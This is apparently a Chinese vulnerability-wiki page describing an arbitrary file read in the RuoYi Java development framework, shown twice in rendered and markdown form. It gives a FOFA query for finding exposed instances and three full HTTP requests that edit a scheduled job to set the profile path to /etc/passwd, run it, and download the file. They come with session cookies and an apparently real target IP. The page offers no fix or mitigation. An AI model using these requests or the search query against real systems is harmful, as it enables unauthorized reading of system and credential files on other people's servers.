fofamini-wiki

登录白背景

源码

若依快速开发框架存在任意文件读取漏洞

一、漏洞简介

ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架存在任意文件读取漏洞

二、影响版本

ruoyi

三、资产测绘

app="若依-管理系统"

四、漏洞复现

首先创建一个定时任务：

POST /monitor/job/edit HTTP/1.1
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 187

jobId=4&updateBy=admin&jobName=beb528e3&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('/etc/passwd')&cronExpression=0%2F10+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=1&remark=

执行定时任务

POST /monitor/job/run HTTP/1.1
accept: */*
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 47.92.253.74:8088
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 7

jobId=4

下载任意文件，可获得前面读取的文件内容

GET /common/download/resource?resource=2.txt HTTP/1.1
accept: */*
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/apill1ggw4fs7gfw

# 若依快速开发框架存在任意文件读取漏洞

# 一、漏洞简介
ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架存在任意文件读取漏洞

# 二、影响版本
+ ruoyi

# 三、资产测绘
```plain
app="若依-管理系统"
```

![1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f.png](./img/AuxDKu9veMdpLM7-/1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f-116767.png)

# 四、漏洞复现
首先创建一个定时任务：

```http
POST /monitor/job/edit HTTP/1.1
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 187

jobId=4&updateBy=admin&jobName=beb528e3&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('/etc/passwd')&cronExpression=0%2F10+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=1&remark=
```

![1721641527176-ce779f57-84b1-41b1-ab89-236a7c6ee8b4.png](./img/AuxDKu9veMdpLM7-/1721641527176-ce779f57-84b1-41b1-ab89-236a7c6ee8b4-287178.png)

执行定时任务

```http
POST /monitor/job/run HTTP/1.1
accept: */*
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 47.92.253.74:8088
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 7

jobId=4
```

![1721641539973-0ea3a972-0749-4033-ba5e-4e015e91aaad.png](./img/AuxDKu9veMdpLM7-/1721641539973-0ea3a972-0749-4033-ba5e-4e015e91aaad-658755.png)

下载任意文件，可获得前面读取的文件内容

```http
GET /common/download/resource?resource=2.txt HTTP/1.1
accept: */*
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Connection: close
```

![1721641551579-d6dadc72-e976-4675-b943-7ee756569610.png](./img/AuxDKu9veMdpLM7-/1721641551579-d6dadc72-e976-4675-b943-7ee756569610-756941.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/apill1ggw4fs7gfw>